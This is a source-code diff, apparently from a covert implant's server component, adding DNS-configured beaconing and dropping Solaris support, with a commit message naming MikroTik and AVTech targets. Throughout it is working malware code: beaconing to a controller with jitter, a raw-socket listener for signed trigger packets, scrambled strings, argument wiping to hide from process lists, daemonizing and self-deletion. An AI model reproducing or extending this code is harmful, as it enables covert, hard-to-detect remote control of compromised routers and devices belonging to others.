128		-	int interval = DEFAULT_BEACON_INTERVAL;
	123	+	struct in_addr beaconIPaddr;
129	124		int trigger_delay = DEFAULT_TRIGGER_DELAY;
130	125		unsigned long delete_delay = SELF_DEL_TIMEOUT;
131		-	float jitter = DEFAULT_BEACON_JITTER * 0.01f;
132	126		int retVal = 0;
133	127		char sdpath[SD_PATH_LENGTH] = {0};
134	128		FILE *f;
135	129		struct stat st;
	130	+	BEACONINFO beaconInfo;
136	131		#ifndef DEBUG
137	132		int status = 0;
138	133		#endif
139	134
140		-
141		-
142		-	#if defined SOLARIS
143		-	int exe_path_size = 256;
144		-	#endif
145		-
146	135		ikey[0] = '\0';
147		-
148	136		init_strings(); // De-scramble strings
149	137
150	138		// Check to see if we have sufficient root/admin permissions to continue.
151	139		// root/admin permissions required for RAW sockets and [on windows] discovering
152	140		// MAC address of ethernet interface(s)
153		-	if ( is_elevated_permissions() != SUCCESS )
154		-	{
	141	+	if ( is_elevated_permissions() != SUCCESS ) {
155	142		fprintf(stderr,"%s", inp183Aq );
156	143		return -1;
157	144		}
158	145
159	146		//initialize srand only once using the initSrandFlag...
160		-	if (!initSrandFlag)
161		-	{
	147	+	if (!initSrandFlag) {
162	148		srand((unsigned int)time(NULL));
163	149		initSrandFlag = 1;
164	150		}
165	151
166		-	#if defined SOLARIS
167		-	memset(exe_path,0,exe_path_size);
168		-	// retVal = run_command("pwd", exe_path, &exe_path_size);
169		-	// if(retVal != 0)
170		-	if ( getcwd( exe_path, exe_path_size ) == NULL )
171		-	{
172		-	DLX(1, perror("getcwd()"));
173		-	DLX(1,printf("\tERROR: exe path returned too long for the buffer\n"));
174		-	}
175		-	else
176		-	{
177		-	//strip off new line
178		-	DLX(1,printf( "exec_path (pwd, cwd) is %s\n", exe_path));
179		-	// memset(strstr(exe_path,"\n"),0, 1);
180		-	}
181		-	#endif
182		-
183	152		//To See Crypto Keys, ENABLE THIS SECTION with debug level 4...
184	153		#if 0
185	154		DLX(4,
		skipped 6 lines
192	161		#endif
193	162
194	163		if (args.patched == 1) {
195		-	// binary was patched
196		-	// all patched times should be already be in milliseconds
197		-	DLX(1, printf("Binary was patched with arguments\n"));
198		-
199		-	beaconPort = args.beacon_port;
200		-	beaconIP = args.beacon_ip;
201		-	szInterface = args.iface;
202		-	initialDelay = args.init_delay;
203		-	interval = args.interval;
204		-	memcpy(ikey, args.idKey, ID_KEY_HASH_SIZE * sizeof(unsigned char));
	164	+	// Binary was patched -- all patched times should already be in milliseconds
	165	+	beaconInfo.port = args.beacon_port;
205	166		trigger_delay = args.trigger_delay;
	167	+	beaconInfo.initDelay = args.init_delay;
	168	+	beaconInfo.interval = args.interval;
	169	+	beaconInfo.percentVariance = args.jitter * 0.01f;
206	170		delete_delay = args.delete_delay;
207		-	jitter = args.jitter * 0.01f;
	171	+
	172	+	memcpy(ikey, args.idKey, ID_KEY_HASH_SIZE * sizeof(unsigned char));
208	173		memcpy(sdpath, args.sdpath, SD_PATH_LENGTH * sizeof(char));
	174	+	cl_string((unsigned char *)sdpath, sizeof(sdpath));
209	175
210		-	// cl_string( (unsigned char *)args.beacon_ip, sizeof( args.beacon_ip ) );
211		-	cl_string( (unsigned char *)args.beacon_ip, args.host_len );
212		-	beaconIP[ args.host_len ] = '\0';
213		-	DLX(1, printf("\tDecoded patched value for hostname/IP: %s\n", beaconIP));
	176	+	cl_string((unsigned char *)args.beacon_ip, sizeof(args.beacon_ip));
	177	+	beaconInfo.host = args.beacon_ip;
214	178
215		-	cl_string( (unsigned char *)args.iface, sizeof( args.iface ) );
216		-	DLX(1, printf( "\tDecoded patched value for interface: %s\n", szInterface));
217		-	cl_string((unsigned char *)sdpath, sizeof(sdpath));
218		-	DLX(1, printf( "\tDecoded sdpath: %s\n", sdpath));
219		-	strncpy(sdcfp, sdpath, strlen(sdpath));
	179	+	cl_string((unsigned char *)args.dns[0], sizeof(args.dns[0]));
	180	+	cl_string((unsigned char *)args.dns[1], sizeof(args.dns[1]));
	181	+	strcpy(beaconInfo.dns[0], args.dns[0]);
	182	+	strcpy(beaconInfo.dns[1], args.dns[1]);
	183	+	strcpy(sdcfp, sdpath);
220	184
221		-	goto okay;
	185	+	#if 0 // Enable for debugging of patched binaries
	186	+	printf("\nBinary was patched with arguments as follows:\n");
	187	+	printf("\t%32s: %-s\n", "Beacon Server IP address", beaconInfo.host);
	188	+	printf("\t%32s: %-d\n", "Beacon Server Port number", args.beacon_port);
	189	+	printf("\t%32s: %-s\n", "Primary DNS Server IP address", args.dns[0]);
	190	+	printf("\t%32s: %-s\n", "Secondary DNS Server IP address", args.dns[1]);
	191	+	printf("\t%32s: %-lu\n", "Beacon Initial Delay (sec)", args.init_delay / 1000);
	192	+	printf("\t%32s: %-d\n", "Beacon Interval (sec)", args.interval / 1000);
	193	+	printf("\t%32s: %-d\n", "Beacon Jitter (%)", args.jitter);
	194	+	printf("\t%32s: %-lu\n", "Self Delete Delay (sec)", args.delete_delay);
	195	+	printf("\t%32s: %-s\n", "Self Delete Control File Path", sdpath);
	196	+	printf("\t%32s: %-d\n\n", "Trigger Delay (+/-30 sec)", args.trigger_delay / 1000);
	197	+	#endif
	198	+
	199	+	goto patched_binary;
	200	+	} else {
	201	+	beaconInfo.port = DEFAULT_BEACON_PORT;
222	202		}
223	203		DLX(1, printf("NOTE: Binary was NOT/NOT patched with arguments\n\n"));
224	204
225	205		// process options
226	206		//while(EOF != (c = getopt(argc, argv, OPT_STRING)))
227	207		#ifdef DEBUG
228		-	while((c = getopt(argc, argv, "a:cD:d:hI:i:j:K:k:P:p:s:t:")) != -1)
	208	+	while((c = getopt(argc, argv, "a:cD:d:hi:j:K:k:P:p:S:s:t:")) != -1)
229	209		#else
230	210		while((c = getopt(argc, argv, ohshsmdlas3r)) != -1)
231	211		#endif
		skipped 1 lines
233	213		switch(c)
234	214		{
235	215		case 'a':
236		-	// todo: check that IP address is valid -- see client for howto
237		-	beaconIP = asloc( optarg );//optarg;
	216	+	beaconInfo.host = asloc( optarg );
238	217		break;
239	218
240	219		#ifdef DEBUG
		skipped 5 lines
246	225		case 'd':
247	226		// user enters delay in seconds and this is converted to milliseconds
248	227		// If set to 0, this will disable all beacons...
249		-	initialDelay = atoi(optarg) * 1000;
250		-	break;
251		-
252		-	case 'I':
253		-	// TODO: new option. what validation is needed?
254		-	szInterface = asloc( optarg );
	228	+	beaconInfo.initDelay = strtoul(optarg, NULL, 0) * 1000;
255	229		break;
256	230
257	231		case 'i':
258	232		// user enters delay in seconds and this is converted to milliseconds
259		-	interval = atoi(optarg) * 1000;
	233	+	beaconInfo.interval = atoi(optarg) * 1000;
260	234		break;
261	235
262	236		case 'j':
263		-	if ( ( atoi(optarg) >= 0 ) && ( atoi(optarg) <= 30 ) )
264		-	{
265		-	jitter = atoi(optarg) * 0.01f;
	237	+	if (( atoi(optarg) >= 0 ) && ( atoi(optarg) <= 30 )) {
	238	+	beaconInfo.percentVariance = atoi(optarg) * 0.01f;
266	239		}
267		-	else
268		-	{
269		-	jitter=-1;
	240	+	else {
	241	+	beaconInfo.percentVariance = -1;
270	242		}
271	243		break;
272	244
		skipped 3 lines
276	248		if (ikey[0] != '\0') { // Ensure that both -k and -K options aren't used together.
277	249		// fprintf(stderr, "Option error\n");
278	250		fprintf(stderr, "%s\n", oe1);
279		-	return -1;
	251	+	return -2;
280	252		}
281	253
282	254		if (access(optarg, R_OK)) {
283	255		fprintf(stderr, "%s\n", oe2);
284		-	return -1;
	256	+	return -3;
285	257		}
286	258		if (stat(optarg, &statbuf) != 0) {
287	259		perror("Option K");
288		-	return -1;
	260	+	return -3;
289	261		}
290		-	if (statbuf.st_size >= ID_KEY_LENGTH_MIN) { // Validate that the key text is of sufficient length
291		-	sha1_file((const char *)optarg, ikey); // Generate the ID key
	262	+	if (statbuf.st_size >= ID_KEY_LENGTH_MIN) { // Validate that the key text is of sufficient length
	263	+	sha1_file((const char *)optarg, ikey); // Generate the ID key
292	264		DLX(1, displaySha1Hash ("Trigger Key: ", ikey));
293		-	sha1(ikey, ID_KEY_HASH_SIZE, ikey); // Generate the implant key
	265	+	sha1(ikey, ID_KEY_HASH_SIZE, ikey); // Generate the implant key
294	266		DLX(1, displaySha1Hash ("Implant Key: ", ikey));
295	267		DLX(1, printf("\n\n\n" ));
296	268		} else {
297	269		fprintf(stderr, "%s\n", oe3);
298		-	return -1;
	270	+	return -4;
299	271		}
300	272		break;
301	273		}
		skipped 5 lines
307	279		if (ikey[0] != '\0') { // Ensure that both -k and -K options aren't used together.
308	280		// fprintf(stderr, "%s\n" "Option error");
309	281		fprintf(stderr, "%s\n", oe1);
310		-	return -1;
	282	+	return -2;
311	283		}
312	284
313		-	if ( strlen( optarg ) < ID_KEY_LENGTH_MIN ) {
	285	+	if (strlen( optarg ) < ID_KEY_LENGTH_MIN) {
314	286		fprintf(stderr, "%s\n", oe3);
315		-	return -1;
	287	+	return -4;
316	288		}
317	289		DLX(1, printf( "KeyPhrase: %s \n", optarg));
318	290		sha1((const unsigned char *)optarg, strlen(optarg), ikey);
		skipped 4 lines
323	295		break;
324	296
325	297		case 'p':
326		-	beaconPort = atoi(optarg);
	298	+	beaconInfo.port = atoi(optarg);
327	299		break;
328	300
329	301		case 'P': // Set path for self-delete control and log files
		skipped 1 lines
331	303		strcpy(sdcfp, optarg); // Copy the path from the argument
332	304		} else {
333	305		fprintf(stderr, "%s\n", sde);
334		-	return -1;
	306	+	return -5;
	307	+	}
	308	+	break;
	309	+
	310	+	case 'S':
	311	+	{
	312	+	char *dns;
	313	+	char *address_list;
	314	+	address_list = asloc(optarg);
	315	+
	316	+	// Get 1st DNS server address and validate its length
	317	+	if ((dns = strtok(address_list, ","))) {
	318	+	if (strlen(dns) > 16) {
	319	+	fprintf(stderr, "%s\n", oe4);
	320	+	return -6;
	321	+	}
	322	+	memcpy(beaconInfo.dns[0], dns, strlen(dns));
	323	+	} else {
	324	+	beaconInfo.dns[0][0] = '\0';
	325	+	fprintf(stderr, "%s\n", sdf); // Parameter missing
	326	+	return -7;
	327	+	}
	328	+
	329	+	// Get 2nd DNS server address if it was entered and validate its length
	330	+	if ((dns = strtok(NULL, ","))) {
	331	+	if (strlen(dns) > 16) {
	332	+	fprintf(stderr, "%s\n", oe4);
	333	+	return -6;
	334	+	}
	335	+	memcpy(beaconInfo.dns[1], dns, strlen(dns));
	336	+	} else
	337	+	beaconInfo.dns[1][0] = '\0';
335	338		}
336	339		break;
337	340
338	341		case 's':
339	342		// user enters self delete delay in seconds, this is NOT converted to milliseconds since Sleep is not used...
340	343		//delete_delay = atoi(optarg);
341		-	delete_delay = strtoul( optarg, NULL, 10);
	344	+	delete_delay = strtoul(optarg, NULL, 10);
342	345		break;
343	346
344	347		case 't':
		skipped 8 lines
353	356		}
354	357		}
355	358
356		-	// process environment variables, if needed
	359	+	// Process environment variables, if needed
357	360
358		-	//validate user input
359		-	//Make sure the beacon's port is specified
360		-	if (beaconPort == -1) {
361		-	DLX(1, printf("No Beacon Port Specified! \n"));
	361	+	if (beaconInfo.initDelay > 0 && beaconInfo.interval == 0 ) {
	362	+	DLX(1, printf("No Beacon Interval specified!\n"));
362	363		DLX(1, printUsage(argv[0]));
	364	+	return -8;
363	365		}
364		-
365		-	//Make sure the IP for the beacon to send to is specified
366		-	if (beaconIP == NULL) {
367		-	DLX(1, printf("No Beacon IP address specified! \n"));
	366	+	if (beaconInfo.initDelay >= (INT_MAX-1)) {
368	367		DLX(1, printUsage(argv[0]));
369		-	return 0;
	368	+	return -9;
370	369		}
371	370
372		-	if (initialDelay > 0 && interval == 0 ) {
373		-	DLX(1, printf("No Beacon Interval specified!\n"));
	371	+	if (ikey[0] == '\0') {
374	372		DLX(1, printUsage(argv[0]));
375		-	return 0;
	373	+	return -10;
376	374		}
377	375
378		-	if (initialDelay >= (INT_MAX-1)) {
379		-	DLX(1, printUsage(argv[0]));
380		-	return 0;
381		-	}
	376	+	clean_args(argc, argv, NULL); // Zero command line arguments
382	377
383		-	//Make sure the jitter is non zero
384		-	if (jitter == -1) {
385		-	DLX(1, printUsage(argv[0]));
386		-	return 0;
387		-	}
	378	+	////////////////////////////////////////////////////////////////////////////////////////////////////////////////
388	379
389		-	if (ikey[0] == '\0') {
390		-	DLX(1, printUsage(argv[0]));
391		-	return 0;
392		-	}
	380	+	patched_binary: // Parsing of command line arguments skipped for patched binaries
393	381
394		-	#ifdef SOLARIS
395		-	// SOLARIS raw socket implementation requires that we specify the specific interface to sniff
396		-	if ( !szInterface ) {
397		-	DLX(1, printf("\nYou must use the -I option for Solaris, this will abort shortly... \n\n"));
398		-	DLX(1, printUsage(argv[0]));
399		-	return -1;
400		-	}
401		-	#endif
	382	+	if (beaconInfo.initDelay > 0) { // Beacons enabled
402	383
403		-	// for Linux and Solaris, zeroize command line arguments
404		-	clean_args(argc, argv, NULL);
	384	+	if (beaconInfo.port == 0) {
	385	+	DLX(1, printf("No Beacon Port Specified!\n"));
	386	+	DLX(1, printUsage(argv[0]));
	387	+	}
405	388
	389	+	if (beaconInfo.host == NULL) { // At this point, the domain name or IP address appears in beaconInfo.host
	390	+	DLX(1, printf("No Beacon IP address specified!\n"));
	391	+	DLX(1, printUsage(argv[0]));
	392	+	return -11;
	393	+	}
406	394
407		-	okay: // if the binary has been patched, we don't need to parse command line arguments
	395	+	if (inet_pton(AF_INET, beaconInfo.host, &beaconIPaddr) <= 0) { // Determine if beacon IP is a valid address
	396	+	if (args.dns[0] == NULL && args.patched == 0) { // If not, verify that a DNS server address was specified
	397	+	DLX(1, printf("Beacon IP was specified as a domain name, but no valid DNS server address was specified to resolve the name!\n"));
	398	+	return -12;
	399	+	}
	400	+	}
	401	+	}
408	402
409	403		// Construct self delete control and log files with full path names
410	404		if (strlen((const char *)sdcfp) == 0) {
411		-	strcpy(sdcfp, (const char *)sddp);
	405	+	strcpy(sdcfp, (const char *)sddp); // If the path wasn't specified use the default ("/var")
412	406		}
413	407
414	408		if (sdcfp[strlen(sdcfp)] != '/') // If the path is missing a trailing '/', add it.
		skipped 20 lines
435	429		DLX(1, printf("\"%s\" file already exists\n", (char *)sdcfp ));
436	430		}
437	431
438		-	if ( args.patched == 1 ) {
439		-	retVal = EnablePersistence(beaconIP,beaconPort);
440		-	if( 0 > retVal) {
441		-	DLX(1, printf("\nCould not enable Persistence!\n"));
442		-	return -1;
443		-	}
444		-	}
	432	+	#if 0 // Enable for debugging of patched binaries
	433	+	printf("\nStarting beacon with the following parameters:\n");
	434	+	printf("\t%32s: %-s\n", "Beacon Server", beaconInfo.host);
	435	+	printf("\t%32s: %-d\n", "Beacon Server Port", beaconInfo.port);
	436	+	printf("\t%32s: %-s\n", "Primary DNS Server IP Address", beaconInfo.dns[0]);
	437	+	printf("\t%32s: %-s\n", "Secondary DNS Server IP Address", beaconInfo.dns[1]);
	438	+	printf("\t%32s: %-lu\n", "Initial Beacon Delay (sec)", beaconInfo.initDelay);
	439	+	printf("\t%32s: %-i\n", "Initial Beacon Delay (sec)", beaconInfo.interval);
	440	+	printf("\t%32s: %-f\n\n", "Initial Beacon Delay (sec)", beaconInfo.percentVariance);
	441	+	#endif
445	442
446	443		#ifndef DEBUG
447	444		status = daemonize(); // for Linux and Solaris
		skipped 3 lines
451	448		}
452	449		#endif
453	450
454		-	if (initialDelay > 0) {
	451	+	if (beaconInfo.initDelay > 0) {
455	452		// create beacon thread
456	453		DLX(1, printf( "Calling BeaconStart()\n"));
457		-	retVal = beacon_start(beaconIP, beaconPort, initialDelay, interval, jitter);
458		-
	454	+	retVal = beacon_start(&beaconInfo);
459	455		if (0 != retVal) {
460	456		DLX(1, printf("Beacon Failed to Start!\n"));
461	457		}
462	458		} else {
463		-	DLX(1, printf("ALL BEACONS DISABLED, initialDelay <= 0.\n"));
	459	+	DLX(1, printf("ALL BEACONS DISABLED, beaconInfo.initDelay <= 0.\n"));
464	460		}
465	461
466	462		// delete_delay
		skipped 1 lines
468	464
469	465		#ifndef __VALGRIND__
470	466		DLX(2, printf( "\tCalling TriggerListen()\n"));
471		-	(void)TriggerListen( szInterface, trigger_delay, delete_delay ); //TODO: TriggerListen() doesn't return a meaningful value.
	467	+	(void)TriggerListen(trigger_delay, delete_delay); //TODO: TriggerListen() doesn't return a meaningful value.
472	468		#endif
473	469
474	470		return 0;
475	471		}
476	472
477	473		//****************************************************************************
478		-	// used to copy argv[] elements out so they can be zeriozed, if permitted by the OS
	474	+	// used to copy argv[] elements out so they can be zeroed, if permitted by the OS
479	475		// Most helpful for unix-like systems and their process lists
480	476		static void * asloc( char *string )
481	477		{
		skipped 30 lines
512	508		return ( geteuid() ? FAILURE : SUCCESS );
513	509		}
514	510
515		-	#if defined LINUX
516	511		//****************************************************************************
517	512		static void clean_args( int argc, char *argv, char new_argv0 )
518	513		{
		skipped 21 lines
540	535
541	536		return;
542	537		}
543		-	#elif defined SOLARIS
544		-	//****************************************************************************
545		-	static void clean_args( int argc, char *argv, char new_argv0 )
546		-	{
547		-	// to silence compiler warnings
548		-	argc = argc;
549		-	argv = argv;
550		-	new_argv0 = new_argv0;
551		-
552		-	return;
553		-	}
554		-	#endif
555	538

■ ■ ■ ■ ■ ■

server/process_list.c

		skipped 112 lines
113	113		if (!lineout)
114	114		{
115	115		lineout = (char *) malloc( defaultIncrementSize );
116		-	D( printf(" defaultIncrementSize = %d, sizeof(lineout)=%d\n", defaultIncrementSize, defaultIncrementSize); );
	116	+	DLX(8, printf(" defaultIncrementSize = %d, sizeof(lineout)=%d\n", defaultIncrementSize, defaultIncrementSize));
117	117		memset( lineout, '\0', defaultIncrementSize );
118	118		//strncat( lineout, blockData, sizeIncrementCount*defaultIncrementSize -1);
119	119		//printf("\n-----------------------------------------------------\n start\n\n %s\n\nend\n-----------------------------------------------\n", lineout);
		skipped 111 lines

■ ■ ■ ■ ■ ■

server/server_strings.txt

		skipped 23 lines
24	24		#define n inp183Aq " Insufficient permissions. Try again...\n"
25	25
26	26		//#define n cmdLineOptionFlags "a:cp:d:hI:i:j:K:k:s:t:"
27		-	#define n cIures4j "a:cd:hI:i:j:K:k:P:p:s:t:"
	27	+	#define n cIures4j "a:cD:d:hi:j:K:k:P:p:S:s:t:"
28	28		#define n oe1 "Option error"
29	29		#define n oe2 "File not found"
30	30		#define n oe3 "ID too short"
	31	+	#define n oe4 "Too many characters for address"
31	32		//#define n proc_uptime "/proc/uptime"
32	33		#define n uPasg18a "/proc/uptime"
33	34		//cmd_str = "ps -ef"
		skipped 83 lines
117	118		#define n sdc ".config"
118	119		#define n sdl ".log"
119	120		#define n sde "Path name too long"
	121	+	#define n sdf "DNS server address missing"
120	122		#define n sddp "/var"
121	123		//sd script shell
122	124		#define n sdss "/bin/sh"
		skipped 106 lines

■ ■ ■ ■ ■ ■

server/trigger_listen.c

		skipped 130 lines
131	131
132	132		DLX(4, printf("Preparing to exec...\n"));
133	133
134		-	#if 0 // TODO: Fix this for Solaris
135		-	/* Solaris SPARC has memory alignment issues, so the bytes of interest need, first,
136		-	to be copied into a variable that is properly aligned */
137		-	memcpy( &tb_id, &( recvd_payload->package[4] ), sizeof( uint16_t ) );
138		-	tb_id = htons( tb_id );
139		-	D( printf("%s, %4d: Received Port: %d\n", __FILE__, __LINE__, tb_id ); )
140		-
141		-	#if defined SOLARIS
142		-	memcpy( &( addrin.S_un ), &( recvd_payload->package[0] ), sizeof( addrin ) );
143		-	#else
144		-	memcpy( &( addrin.s_addr ), &( recvd_payload->package[0] ), sizeof( addrin ) );
145		-	#endif
146		-	#endif
147		-
148	134		// IPv4 addresses only....
149	135		{
150	136		char callback_address[INET_ADDRSTRLEN];
		skipped 18 lines
169	155
170	156		//******************************************************************
171	157
172		-	int TriggerListen( char *iface, int trigger_delay, unsigned long delete_delay )
	158	+	int TriggerListen(int trigger_delay, unsigned long delete_delay)
173	159		{
174	160		int socket_fd, packet_length;
175	161		int counter = 0;
		skipped 1 lines
177	163
178	164		Payload recvd_payload;
179	165		TriggerInfo *tParams;
180		-	#ifdef LINUX
181	166		struct sockaddr_ll packet_info;
182	167		size_t packet_info_size = sizeof( packet_info);
183		-	#endif
	168	+
184	169
185	170		DL(2);
186	171		// reap any CHILD processes that die, prevent zombies
187	172		// this is not needed because no processes are forked
188	173		signal( SIGCHLD, sigchld_reaper );
189	174
190		-	socket_fd = dt_get_socket_fd( iface );
	175	+	socket_fd = dt_get_socket_fd();
191	176
192	177		if( socket_fd == FAILURE )
193	178		{
		skipped 10 lines
204	189		}
205	190
206	191		memset( packet_buffer, 0, MAX_PKT );
207		-	#if defined SOLARIS
208		-	// DLX(6, printf( "Listening on solaris raw socket\n"));
209		-	packet_length = sniff_read_solaris( socket_fd, packet_buffer, MAX_PKT );
210		-	// DLX(8, printf( "Packet received with length %d bytes\n", packet_length));
211		-
212		-	if ( packet_length == FAILURE ) {
213		-	// not sure what to do upon recv error
214		-	DLX(5, printf(" ERROR: sniff_read_solaris() returned FAILURE\n"));
215		-	continue;
216		-	}
217		-
218		-	#else
219	192
220	193		if ( ( packet_length = recvfrom( socket_fd, packet_buffer, MAX_PKT, 0,
221	194		(struct sockaddr ) &packet_info, (socklen_t ) &packet_info_size ) ) == FAILURE )
		skipped 2 lines
224	197		DLX(4, printf("Error: recvfrom() failure!\n"));
225	198		continue;
226	199		}
227		-	#endif
	200	+
228	201		else
229	202		{
230	203		if ( dt_signature_check( packet_buffer, packet_length, &recvd_payload) == SUCCESS )
		skipped 102 lines

■ ■ ■ ■ ■ ■

server/trigger_listen.h

		skipped 22 lines
23	23
24	24		#define MAX_PKT 1750
25	25
26		-	//int TriggerListen( char szInterface, char clientIP, int clientPort );
27		-	int TriggerListen( char *szInterface, int trigger_delay, unsigned long delete_delay );
	26	+	int TriggerListen(int trigger_delay, unsigned long delete_delay);
28	27
29	28		// TODO: delete this prototype
30	29		int trigger_main( int argc, char ** argv);
		skipped 9 lines

■ ■ ■ ■ ■ ■

server/trigger_sniff.c

		skipped 7 lines
8	8		#include "unpifi.h"
9	9		#endif
10	10
11		-	#if defined LINUX
12	11		#include <features.h>
13	12		#include <linux/if_packet.h>
14	13		#include <linux/if_ether.h>
15		-	#endif
16		-
17		-	#if defined SOLARIS
18		-	#include <sys/dlpi.h>
19		-	#include <stropts.h>
20		-	#include <unistd.h>
21		-	#include <sys/types.h>
22		-	#include <sys/stat.h>
23		-	#include <fcntl.h>
24		-	#define MIN(X,Y) ((X) < (Y) ? (X) : (Y))
25		-	#endif
26	14
27	15		#include <string.h>
28	16		#include <stdlib.h>
		skipped 7 lines
36	24		/* This is the only external function in the file,
37	25		* all other funcs are private static helpers to this.
38	26		*/
39		-	int dt_get_socket_fd( char *iface )
	27	+	int dt_get_socket_fd()
40	28		{
41	29		int fd;
42	30
43		-	fd = dt_create_raw_socket( iface );
	31	+	fd = dt_create_raw_socket();
44	32
45	33		if ( fd == -1 )
46	34		{
		skipped 23 lines
70	58		}
71	59
72	60		//************************************************************************
73		-	int dt_create_raw_socket( char *iface )
	61	+	int dt_create_raw_socket()
74	62		{
75	63		int raw_fd;
76		-	iface = iface;
77	64
78	65		if ( ( raw_fd = socket( PF_PACKET, SOCK_RAW, htons( ETH_P_IP ) ) ) == -1 )
79	66		{
		skipped 5 lines
85	72
86	73		#endif //_#if defined LINUX
87	74
88		-
89		-	//************************************************************************
90		-
91		-	#if defined SOLARIS
92		-
93		-	#include <unistd.h> // for ioctl()
94		-	#include <stropts.h> // for ioctl opts.
95		-
96		-	#include "dlcommon.h"
97		-
98		-	//************************************************************************
99		-	int sniff_read_solaris( int fd, void *out, int outlen )
100		-	{
101		-	struct strbuf data;
102		-	char buffer[ MAXDLBUF ]; //8k x sizeof( long )
103		-	int ret = 0, flags = 0;
104		-
105		-	// initialize the incoming packet buffer
106		-	memset( &data, 0, sizeof(data) );
107		-	data.buf = buffer;
108		-
109		-	// only request the minimum size of our buffer here,
110		-	// or the destination buffer. Saves us some logic at
111		-	// memcpy() below - when we go to fill the callers buffer
112		-	data.maxlen = MIN( outlen, MAXDLBUF );
113		-	data.len = 0;
114		-
115		-	/* Upon successful completion, a non-negative value is
116		-	returned. A return value of 0 indicates that a full message
117		-	was read successfully. A return value of MORECTL indicates
118		-	that more control information is waiting for retrieval. A
119		-	return value of MOREDATA indicates that more data are wait-
120		-	ing for retrieval. A return value of MORECTL \| MOREDATA
121		-	indicates that both types of information remain. */
122		-	if ( ( ret = getmsg( fd, NULL, &data, &flags ) ) < 0 )
123		-	{ // ERROR
124		-	DLX(6, perror("getmsg() error: "));
125		-	return FAILURE;
126		-	}
127		-
128		-	if ( data.len > 0 )
129		-	{
130		-	memcpy( out, data.buf, data.len );
131		-	return( data.len );
132		-	}
133		-
134		-	// not reached
135		-	return FAILURE;
136		-	}
137		-
138		-	//************************************************************************
139		-
140		-	static int sniff_make_promiscuous_solaris( int fd )
141		-	{
142		-	char buf[ MAXDLBUF ];
143		-
144		-	// dlpromisconreq( fd, DL_PROMISC_PHYS ); // TODO - to get all packets?
145		-	dlpromisconreq( fd, DL_PROMISC_SAP );
146		-	dlokack( fd, buf );
147		-
148		-	return 0;
149		-	}
150		-
151		-
152		-	//************************************************************************
153		-	int sniff_start_solaris( char *devname )
154		-	{
155		-	char device[16], buf[MAXDLBUF];
156		-	int device_len;
157		-	uint32_t ppa = 0, sap = 0;
158		-	int fd;
159		-
160		-	// create logical device path, ppa#, sap# = 0 for ethernet.
161		-	device_len = strlen( devname );
162		-	ppa = atoi( &(devname[device_len - 1]) );
163		-	snprintf( device, 16, "/dev/%s", devname );
164		-	D( printf( " DEBUG: devname = %s\n", devname ); )
165		-	device_len = strlen( device );
166		-	device[ device_len - 1 ] = 0; // nul terminate off the number.
167		-
168		-	D( printf( " DEBUG: Solaris logical network device: ==> %s\n", device ); )
169		-	D( printf( " DEBUG: PPA: ==> %d\t\tSAP: ==> %d\n", ppa, sap ); )
170		-	fd = open( device, 2 ); // 2 = O_RDWR?
171		-
172		-	// attach logical device fd to ppa.
173		-	dlattachreq( fd, ppa );
174		-	dlokack( fd, buf );
175		-
176		-	sniff_make_promiscuous_solaris( fd );
177		-
178		-	// bind logical device to sap.
179		-	dlbindreq( fd, sap, 0, DL_CLDLS, 0, 0 );
180		-	dlbindack( fd, buf );
181		-
182		-	// issue DLIOCRAW.
183		-	if ( strioctl( fd, DLIOCRAW, -1, 0, NULL ) < 0 )
184		-	{
185		-	D( perror( " strioctl() setting DLIOCRAW" ); )
186		-	goto cleanup;
187		-	}
188		-
189		-	// flush the read side of the stream.
190		-	if ( ioctl( fd, I_FLUSH, FLUSHR ) < 0 )
191		-	{
192		-	D( perror( " ioctl() flushing read stream" ); )
193		-	goto cleanup;
194		-	}
195		-
196		-	return( fd );
197		-
198		-	cleanup:
199		-	D( printf( " ERROR: starting Solaris raw link-layer socket.\n" );)
200		-	close( fd );
201		-	return( -1 );
202		-	}
203		-
204		-	/* TODO: Add this loopback interface check.
205		-	if (( ctx->name ) && ( strncmp( ctx->name, "lo", 2 ) == 0 ))
206		-	{
207		-	debug_error("Solaris cannot be set to sniff on loopback device.\n" );
208		-	free( ctx->name );
209		-	ctx->name = NULL;
210		-	return( -1 );
211		-	}
212		-	*/
213		-
214		-	//************************************************************************
215		-	int dt_find_interface_and_bind( int fd, int proto )
216		-	{
217		-	// to silence compiler warnings
218		-	fd = fd;
219		-	proto = proto;
220		-
221		-	return 0;
222		-	}
223		-
224		-	//************************************************************************
225		-	int dt_create_raw_socket( char *iface )
226		-	{
227		-	int raw_fd;
228		-
229		-	D( printf( " DEBUG: Starting dt_create_raw_socket\n" ); )
230		-
231		-	if ( ( raw_fd = sniff_start_solaris( iface ) ) == -1 )
232		-	{
233		-	return FAILURE;
234		-	}
235		-
236		-	return raw_fd;
237		-	}
238		-	#endif //_#if defined SOLARIS
239		-

■ ■ ■ ■ ■ ■

server/trigger_sniff.h

		skipped 2 lines
3	3
4	4		#include "function_strings.h"
5	5
6		-	int dt_get_socket_fd( char *iface );
	6	+	int dt_get_socket_fd();
7	7
8	8		int dt_find_interface_and_bind(int fd, int proto);
9	9
10		-	int dt_create_raw_socket( char *iface );
	10	+	int dt_create_raw_socket();
11	11
12	12		int dt_bind_raw_socket( char* device, int raw_fd, int proto);
13	13
		skipped 10 lines

Merge of changes for MikroTik 6.x and AVTech (ARM v7).